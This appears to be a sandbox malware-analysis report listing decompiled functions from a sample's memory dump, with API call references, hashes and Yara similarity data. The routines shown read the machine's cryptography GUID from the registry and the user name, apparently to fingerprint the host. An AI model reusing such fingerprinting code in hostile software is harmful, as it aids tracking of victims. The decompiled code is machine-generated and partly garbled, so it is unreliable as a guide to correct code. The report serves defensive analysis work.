                                                                                                                                                                                              0x0040755b
                                                                                                                                                                                              0x00407562
                                                                                                                                                                                              0x00407562
                                                                                                                                                                                              0x004075a9
                                                                                                                                                                                              0x004075b9
                                                                                                                                                                                              0x004075bf
                                                                                                                                                                                              0x004075c6
                                                                                                                                                                                              0x004075ca
                                                                                                                                                                                              0x004075cd
                                                                                                                                                                                              0x004075d0
                                                                                                                                                                                              0x004075e2

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020019,?), ref: 00407582
                                                                                                                                                                                              • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocOpenQueryStringValue
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4139485348-0
                                                                                                                                                                                              • Opcode ID: 3ed5b2ee1dba194cc6dbe336fcadb55ada54ae4c4b70a41d90ff88955bf18e37
                                                                                                                                                                                              • Instruction ID: a534eb6d79e9af16e12b264bd48d331209bfd9d9316274433d90d6d6e5d4440a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ed5b2ee1dba194cc6dbe336fcadb55ada54ae4c4b70a41d90ff88955bf18e37
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1921C771A04109AFD700EB99CD81EEEBBFCEB48304F504576B904E7691D774AE448A65
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 004033F4, Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                                                              			E004033F4() {
				struct HINSTANCE__* _t24;
				void* _t32;
				intOrPtr _t35;
				void* _t45;

				if( *0x0041C650 != 0 ||  *0x41c030 == 0) {
					L3:
					if( *0x41b004 != 0) {
						E004032DC();
						E00403368(_t32);
						 *0x41b004 = 0;
					}
					L5:
					while(1) {
						if( *((char*)(0x41c650)) == 2 &&  *0x41b000 == 0) {
							 *0x0041C634 = 0;
						}
						E004031DC();
						if( *((char*)(0x41c650)) <= 1 ||  *0x41b000 != 0) {
							_t14 =  *0x0041C638;
							if( *0x0041C638 != 0) {
								E00404890(_t14);
								_t35 =  *((intOrPtr*)(0x41c638));
								_t7 = _t35 + 0x10; // 0x0
								_t24 =  *_t7;
								_t8 = _t35 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						E004031B4();
						if( *((char*)(0x41c650)) == 1) {
							 *0x0041C64C();
						}
						if( *((char*)(0x41c650)) != 0) {
							E00403338();
						}
						if( *0x41c628 == 0) {
							if( *0x41c018 != 0) {
								 *0x41c018();
							}
							ExitProcess( *0x41b000); // executed
						}
						memcpy(0x41c628,  *0x41c628, 0xb << 2);
						_t45 = _t45 + 0xc;
						0x41b000 = 0x41b000;
					}
				} else {
					do {
						 *0x41c030 = 0;
						 *((intOrPtr*)( *0x41c030))();
					} while ( *0x41c030 != 0);
					goto L3;
				}
			}







                                                                                                                                                                                              0x0040340b
                                                                                                                                                                                              0x00403423
                                                                                                                                                                                              0x0040342a
                                                                                                                                                                                              0x0040342c
                                                                                                                                                                                              0x00403431
                                                                                                                                                                                              0x00403438
                                                                                                                                                                                              0x00403438
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040343d
                                                                                                                                                                                              0x00403441
                                                                                                                                                                                              0x0040344a
                                                                                                                                                                                              0x0040344a
                                                                                                                                                                                              0x0040344d
                                                                                                                                                                                              0x00403456
                                                                                                                                                                                              0x0040345d
                                                                                                                                                                                              0x00403462
                                                                                                                                                                                              0x00403464
                                                                                                                                                                                              0x00403469
                                                                                                                                                                                              0x0040346c
                                                                                                                                                                                              0x0040346c
                                                                                                                                                                                              0x0040346f
                                                                                                                                                                                              0x00403472
                                                                                                                                                                                              0x00403479
                                                                                                                                                                                              0x00403479
                                                                                                                                                                                              0x00403472
                                                                                                                                                                                              0x00403462
                                                                                                                                                                                              0x0040347e
                                                                                                                                                                                              0x00403487
                                                                                                                                                                                              0x00403489
                                                                                                                                                                                              0x00403489
                                                                                                                                                                                              0x00403490
                                                                                                                                                                                              0x00403492
                                                                                                                                                                                              0x00403492
                                                                                                                                                                                              0x0040349a
                                                                                                                                                                                              0x004034a3
                                                                                                                                                                                              0x004034a5
                                                                                                                                                                                              0x004034a5
                                                                                                                                                                                              0x004034ae
                                                                                                                                                                                              0x004034ae
                                                                                                                                                                                              0x004034bf
                                                                                                                                                                                              0x004034bf
                                                                                                                                                                                              0x004034c1
                                                                                                                                                                                              0x004034c1
                                                                                                                                                                                              0x00403412
                                                                                                                                                                                              0x00403412
                                                                                                                                                                                              0x00403418
                                                                                                                                                                                              0x0040341c
                                                                                                                                                                                              0x0040341e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00403412

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExitFreeLibraryProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1404682716-0
                                                                                                                                                                                              • Opcode ID: 8728ad655b3e503d2fdb3a62f9eb409c209a4d433934cda3c6acf7bd146207aa
                                                                                                                                                                                              • Instruction ID: 759013028fc8479fd2dc72d2fd20690e0ff356ad8f398ebd0a8dd26c183a4070
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8728ad655b3e503d2fdb3a62f9eb409c209a4d433934cda3c6acf7bd146207aa
                                                                                                                                                                                              • Instruction Fuzzy Hash: 532162709002408BDB229F6584847577FD9AB49356F2585BBE844AF2C6D77CCEC0C7AD
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 004033EC, Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                                                              			E004033EC() {
				intOrPtr* _t13;
				struct HINSTANCE__* _t27;
				void* _t36;
				intOrPtr _t39;
				void* _t52;

				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
				if( *0x0041C650 != 0 ||  *0x41c030 == 0) {
					L5:
					if( *0x41b004 != 0) {
						E004032DC();
						E00403368(_t36);
						 *0x41b004 = 0;
					}
					L7:
					if( *((char*)(0x41c650)) == 2 &&  *0x41b000 == 0) {
						 *0x0041C634 = 0;
					}
					E004031DC();
					if( *((char*)(0x41c650)) <= 1 ||  *0x41b000 != 0) {
						_t17 =  *0x0041C638;
						if( *0x0041C638 != 0) {
							E00404890(_t17);
							_t39 =  *((intOrPtr*)(0x41c638));
							_t7 = _t39 + 0x10; // 0x0
							_t27 =  *_t7;
							_t8 = _t39 + 4; // 0x400000
							if(_t27 !=  *_t8 && _t27 != 0) {
								FreeLibrary(_t27);
							}
						}
					}
					E004031B4();
					if( *((char*)(0x41c650)) == 1) {
						 *0x0041C64C();
					}
					if( *((char*)(0x41c650)) != 0) {
						E00403338();
					}
					if( *0x41c628 == 0) {
						if( *0x41c018 != 0) {
							 *0x41c018();
						}
						ExitProcess( *0x41b000); // executed
					}
					memcpy(0x41c628,  *0x41c628, 0xb << 2);
					_t52 = _t52 + 0xc;
					0x41b000 = 0x41b000;
					goto L7;
				} else {
					do {
						 *0x41c030 = 0;
						 *((intOrPtr*)( *0x41c030))();
					} while ( *0x41c030 != 0);
					goto L5;
				}
			}








                                                                                                                                                                                              0x004033ee
                                                                                                                                                                                              0x0040340b
                                                                                                                                                                                              0x00403423
                                                                                                                                                                                              0x0040342a
                                                                                                                                                                                              0x0040342c
                                                                                                                                                                                              0x00403431
                                                                                                                                                                                              0x00403438
                                                                                                                                                                                              0x00403438
                                                                                                                                                                                              0x0040343d
                                                                                                                                                                                              0x00403441
                                                                                                                                                                                              0x0040344a
                                                                                                                                                                                              0x0040344a
                                                                                                                                                                                              0x0040344d
                                                                                                                                                                                              0x00403456
                                                                                                                                                                                              0x0040345d
                                                                                                                                                                                              0x00403462
                                                                                                                                                                                              0x00403464
                                                                                                                                                                                              0x00403469
                                                                                                                                                                                              0x0040346c
                                                                                                                                                                                              0x0040346c
                                                                                                                                                                                              0x0040346f
                                                                                                                                                                                              0x00403472
                                                                                                                                                                                              0x00403479
                                                                                                                                                                                              0x00403479
                                                                                                                                                                                              0x00403472
                                                                                                                                                                                              0x00403462
                                                                                                                                                                                              0x0040347e
                                                                                                                                                                                              0x00403487
                                                                                                                                                                                              0x00403489
                                                                                                                                                                                              0x00403489
                                                                                                                                                                                              0x00403490
                                                                                                                                                                                              0x00403492
                                                                                                                                                                                              0x00403492
                                                                                                                                                                                              0x0040349a
                                                                                                                                                                                              0x004034a3
                                                                                                                                                                                              0x004034a5
                                                                                                                                                                                              0x004034a5
                                                                                                                                                                                              0x004034ae
                                                                                                                                                                                              0x004034ae
                                                                                                                                                                                              0x004034bf
                                                                                                                                                                                              0x004034bf
                                                                                                                                                                                              0x004034c1
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00403412
                                                                                                                                                                                              0x00403412
                                                                                                                                                                                              0x00403418
                                                                                                                                                                                              0x0040341c
                                                                                                                                                                                              0x0040341e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00403412

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExitFreeLibraryProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1404682716-0
                                                                                                                                                                                              • Opcode ID: 12e1264d31eb56f2234adc36a07824a312904d80612c0ba461cf097056190f6f
                                                                                                                                                                                              • Instruction ID: 6a24a9e445b26bd493014d0ae565dbad687ffc3c4e0e672e3f19fd4d116e45a8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 12e1264d31eb56f2234adc36a07824a312904d80612c0ba461cf097056190f6f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 082132709002408FDB229F6584847567FE9AF49316F1585BBE844AE2D6D77CCEC0C799
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 004033F0, Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                                                              			E004033F0() {
				struct HINSTANCE__* _t26;
				void* _t35;
				intOrPtr _t38;
				void* _t51;

				if( *0x0041C650 != 0 ||  *0x41c030 == 0) {
					L4:
					if( *0x41b004 != 0) {
						E004032DC();
						E00403368(_t35);
						 *0x41b004 = 0;
					}
					L6:
					if( *((char*)(0x41c650)) == 2 &&  *0x41b000 == 0) {
						 *0x0041C634 = 0;
					}
					E004031DC();
					if( *((char*)(0x41c650)) <= 1 ||  *0x41b000 != 0) {
						_t16 =  *0x0041C638;
						if( *0x0041C638 != 0) {
							E00404890(_t16);
							_t38 =  *((intOrPtr*)(0x41c638));
							_t7 = _t38 + 0x10; // 0x0
							_t26 =  *_t7;
							_t8 = _t38 + 4; // 0x400000
							if(_t26 !=  *_t8 && _t26 != 0) {
								FreeLibrary(_t26);
							}
						}
					}
					E004031B4();
					if( *((char*)(0x41c650)) == 1) {
						 *0x0041C64C();
					}
					if( *((char*)(0x41c650)) != 0) {
						E00403338();
					}
					if( *0x41c628 == 0) {
						if( *0x41c018 != 0) {
							 *0x41c018();
						}
						ExitProcess( *0x41b000); // executed
					}
					memcpy(0x41c628,  *0x41c628, 0xb << 2);
					_t51 = _t51 + 0xc;
					0x41b000 = 0x41b000;
					goto L6;
				} else {
					do {
						 *0x41c030 = 0;
						 *((intOrPtr*)( *0x41c030))();
					} while ( *0x41c030 != 0);
					goto L4;
				}
			}







                                                                                                                                                                                              0x0040340b
                                                                                                                                                                                              0x00403423
                                                                                                                                                                                              0x0040342a
                                                                                                                                                                                              0x0040342c
                                                                                                                                                                                              0x00403431
                                                                                                                                                                                              0x00403438
                                                                                                                                                                                              0x00403438
                                                                                                                                                                                              0x0040343d
                                                                                                                                                                                              0x00403441
                                                                                                                                                                                              0x0040344a
                                                                                                                                                                                              0x0040344a
                                                                                                                                                                                              0x0040344d
                                                                                                                                                                                              0x00403456
                                                                                                                                                                                              0x0040345d
                                                                                                                                                                                              0x00403462
                                                                                                                                                                                              0x00403464
                                                                                                                                                                                              0x00403469
                                                                                                                                                                                              0x0040346c
                                                                                                                                                                                              0x0040346c
                                                                                                                                                                                              0x0040346f
                                                                                                                                                                                              0x00403472
                                                                                                                                                                                              0x00403479
                                                                                                                                                                                              0x00403479
                                                                                                                                                                                              0x00403472
                                                                                                                                                                                              0x00403462
                                                                                                                                                                                              0x0040347e
                                                                                                                                                                                              0x00403487
                                                                                                                                                                                              0x00403489
                                                                                                                                                                                              0x00403489
                                                                                                                                                                                              0x00403490
                                                                                                                                                                                              0x00403492
                                                                                                                                                                                              0x00403492
                                                                                                                                                                                              0x0040349a
                                                                                                                                                                                              0x004034a3
                                                                                                                                                                                              0x004034a5
                                                                                                                                                                                              0x004034a5
                                                                                                                                                                                              0x004034ae
                                                                                                                                                                                              0x004034ae
                                                                                                                                                                                              0x004034bf
                                                                                                                                                                                              0x004034bf
                                                                                                                                                                                              0x004034c1
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00403412
                                                                                                                                                                                              0x00403412
                                                                                                                                                                                              0x00403418
                                                                                                                                                                                              0x0040341c
                                                                                                                                                                                              0x0040341e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00403412

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExitFreeLibraryProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1404682716-0
                                                                                                                                                                                              • Opcode ID: 48b7e33afc810a21c896a39620d19b1e342ee901d510fcbf56cb23baece62cc7
                                                                                                                                                                                              • Instruction ID: 27f7e017d1627fb368da8b77f9887733e34b03074980a547fb73b729214f25e1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 48b7e33afc810a21c896a39620d19b1e342ee901d510fcbf56cb23baece62cc7
                                                                                                                                                                                              • Instruction Fuzzy Hash: A42141709002408BDB229F6584847577FE9AF49316F2585BBE844AE2C6D77CCEC0CB9D
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00406DA8, Relevance: 3.1, APIs: 2, Instructions: 58registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 65%
                                                                                                                                                                                              			E00406DA8(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4) {
				char _v8;
				char _v12;
				int _v16;
				int _v20;
				void* _v24;
				char _v536;
				void* _t18;
				intOrPtr _t52;
				void* _t56;

				_t18 = __eax - 0x55000000;
				_v12 = __ecx;
				_v8 = __edx;
				E004040F4( &_v8);
				E004040F4( &_v12);
				_push(_t56);
				_push(0x406e5f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xfffffdec;
				_v20 = 0xfe;
				_v536 = 0;
				RegOpenKeyExW(_t18, E00403D3C(_v8), 0, 0x20119,  &_v24); // executed
				RegQueryValueExW(_v24, E00403D3C(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
				E00403D10(_a4, 0x100,  &_v536);
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(E00406E66);
				return E00403B98( &_v12, 2);
			}












                                                                                                                                                                                              0x00406da8
                                                                                                                                                                                              0x00406db6
                                                                                                                                                                                              0x00406db9
                                                                                                                                                                                              0x00406dc1
                                                                                                                                                                                              0x00406dc9
                                                                                                                                                                                              0x00406dd0
                                                                                                                                                                                              0x00406dd1
                                                                                                                                                                                              0x00406dd6
                                                                                                                                                                                              0x00406dd9
                                                                                                                                                                                              0x00406ddc
                                                                                                                                                                                              0x00406de3
                                                                                                                                                                                              0x00406e08
                                                                                                                                                                                              0x00406e2f
                                                                                                                                                                                              0x00406e3f
                                                                                                                                                                                              0x00406e46
                                                                                                                                                                                              0x00406e49
                                                                                                                                                                                              0x00406e4c
                                                                                                                                                                                              0x00406e5e

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?), ref: 00406E08
                                                                                                                                                                                              • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406E2F
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$AllocFreeOpenQueryValue
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 967375698-0
                                                                                                                                                                                              • Opcode ID: 42e8ac0eb481dbdee281ab6c948f954a5f7be2f1dbc7aad8dbdbf02e747b1a52
                                                                                                                                                                                              • Instruction ID: d76901b39ac324b957afaa178e8467113ca23e905bfc9c7565385042a447591e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 42e8ac0eb481dbdee281ab6c948f954a5f7be2f1dbc7aad8dbdbf02e747b1a52
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E110A71600209AFD700EB99C991ADEBBFCEB48304F504176B504E3291D774AF048AA5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00406DAC, Relevance: 3.1, APIs: 2, Instructions: 58registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 65%
                                                                                                                                                                                              			E00406DAC(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4) {
				char _v8;
				char _v12;
				int _v16;
				int _v20;
				void* _v24;
				char _v536;
				void* _t44;
				intOrPtr _t51;
				void* _t55;

				_v12 = __ecx;
				_v8 = __edx;
				_t44 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				_push(_t55);
				_push(0x406e5f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffdec;
				_v20 = 0xfe;
				_v536 = 0;
				RegOpenKeyExW(_t44, E00403D3C(_v8), 0, 0x20119,  &_v24); // executed
				RegQueryValueExW(_v24, E00403D3C(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
				E00403D10(_a4, 0x100,  &_v536);
				_pop(_t51);
				 *[fs:eax] = _t51;
				_push(E00406E66);
				return E00403B98( &_v12, 2);
			}












                                                                                                                                                                                              0x00406db6
                                                                                                                                                                                              0x00406db9
                                                                                                                                                                                              0x00406dbc
                                                                                                                                                                                              0x00406dc1
                                                                                                                                                                                              0x00406dc9
                                                                                                                                                                                              0x00406dd0
                                                                                                                                                                                              0x00406dd1
                                                                                                                                                                                              0x00406dd6
                                                                                                                                                                                              0x00406dd9
                                                                                                                                                                                              0x00406ddc
                                                                                                                                                                                              0x00406de3
                                                                                                                                                                                              0x00406e08
                                                                                                                                                                                              0x00406e2f
                                                                                                                                                                                              0x00406e3f
                                                                                                                                                                                              0x00406e46
                                                                                                                                                                                              0x00406e49
                                                                                                                                                                                              0x00406e4c
                                                                                                                                                                                              0x00406e5e

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?), ref: 00406E08
                                                                                                                                                                                              • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406E2F
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$AllocFreeOpenQueryValue
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 967375698-0
                                                                                                                                                                                              • Opcode ID: 2211f0de82845023bd4461a93eb36700242ae8860f2016ef3c98de18d7d5de81
                                                                                                                                                                                              • Instruction ID: 82cb5f20ed390e82a860d028ca805bd23af48b7bdc57f11f8f6bbfe72b4b229b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2211f0de82845023bd4461a93eb36700242ae8860f2016ef3c98de18d7d5de81
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0211EC75600209AFD701EB99CD81EDEBBFCEB48704F504576B504F3291DB74AF448AA5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00401388, Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00401388(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E0040123C(0x41c5d4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                                                                                                                                                                              0x0040138b
                                                                                                                                                                                              0x00401395
                                                                                                                                                                                              0x004013a4
                                                                                                                                                                                              0x00401397
                                                                                                                                                                                              0x00401397
                                                                                                                                                                                              0x00401397
                                                                                                                                                                                              0x004013aa
                                                                                                                                                                                              0x004013b7
                                                                                                                                                                                              0x004013bc
                                                                                                                                                                                              0x004013be
                                                                                                                                                                                              0x004013c2
                                                                                                                                                                                              0x004013cb
                                                                                                                                                                                              0x004013d2
                                                                                                                                                                                              0x004013de
                                                                                                                                                                                              0x004013e5
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004013e5
                                                                                                                                                                                              0x004013d2
                                                                                                                                                                                              0x004013ea

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013B7
                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013DE
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Virtual$AllocFree
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2087232378-0
                                                                                                                                                                                              • Opcode ID: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
                                                                                                                                                                                              • Instruction ID: a459bd48843060549903651ed84add4fd647ab7a4347e8b1aec55fdbd67c2c02
                                                                                                                                                                                              • Opcode Fuzzy Hash: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 72F0E972B0032017EB2055690CC1F5265C58B46760F14417BBE08FF7D9C6758C008299
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 004065C4, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E004065C4(intOrPtr* __eax) {
				short _v516;
				signed int _t4;
				signed int _t5;
				int _t9;
				void* _t11;
				signed int _t14;
				void* _t18;
				DWORD* _t19;

				_t4 = __eax +  *__eax;
				 *_t4 =  *_t4 + _t4;
				_t5 = _t4 | 0x5300000a;
				_t19 = _t18 + 0xfffffdfc;
				_t14 = _t5;
				 *_t19 = 0xff;
				_t9 = GetUserNameW( &_v516, _t19); // executed
				if(_t9 == 0) {
					_t11 = E00403B80(_t14);
				} else {
					_t11 = E00403D10(_t14, 0x100,  &_v516);
				}
				return _t11;
			}











                                                                                                                                                                                              0x004065c4
                                                                                                                                                                                              0x004065c6
                                                                                                                                                                                              0x004065c8
                                                                                                                                                                                              0x004065cd
                                                                                                                                                                                              0x004065d3
                                                                                                                                                                                              0x004065d5
                                                                                                                                                                                              0x004065e9
                                                                                                                                                                                              0x004065ed
                                                                                                                                                                                              0x00406603
                                                                                                                                                                                              0x004065ef
                                                                                                                                                                                              0x004065fa
                                                                                                                                                                                              0x004065fa
                                                                                                                                                                                              0x0040660f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: NameUser
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2645101109-0
                                                                                                                                                                                              • Opcode ID: 1ebdfbd59a0e52ef2ea023c9a08e44020ac5f15f939b277ac4f00344f859253b
                                                                                                                                                                                              • Instruction ID: cd992ebe0347ba42bda0945abe6e894bfe88d76707d831bffa21c0f3d5584e5e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ebdfbd59a0e52ef2ea023c9a08e44020ac5f15f939b277ac4f00344f859253b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 29E04FB12082425FD312EB98D880AA677E59F89300F05487AA885C72E1EE35DE649B57
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 004065C8, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E004065C8(signed int __eax) {
				short _v516;
				signed int _t4;
				int _t8;
				void* _t10;
				signed int _t13;
				void* _t17;
				DWORD* _t18;

				_t4 = __eax | 0x5300000a;
				_t18 = _t17 + 0xfffffdfc;
				_t13 = _t4;
				 *_t18 = 0xff;
				_t8 = GetUserNameW( &_v516, _t18); // executed
				if(_t8 == 0) {
					_t10 = E00403B80(_t13);
				} else {
					_t10 = E00403D10(_t13, 0x100,  &_v516);
				}
				return _t10;
			}










                                                                                                                                                                                              0x004065c8
                                                                                                                                                                                              0x004065cd
                                                                                                                                                                                              0x004065d3
                                                                                                                                                                                              0x004065d5
                                                                                                                                                                                              0x004065e9
                                                                                                                                                                                              0x004065ed
                                                                                                                                                                                              0x00406603
                                                                                                                                                                                              0x004065ef
                                                                                                                                                                                              0x004065fa
                                                                                                                                                                                              0x004065fa
                                                                                                                                                                                              0x0040660f

                                                                                                                                                                                              APIs
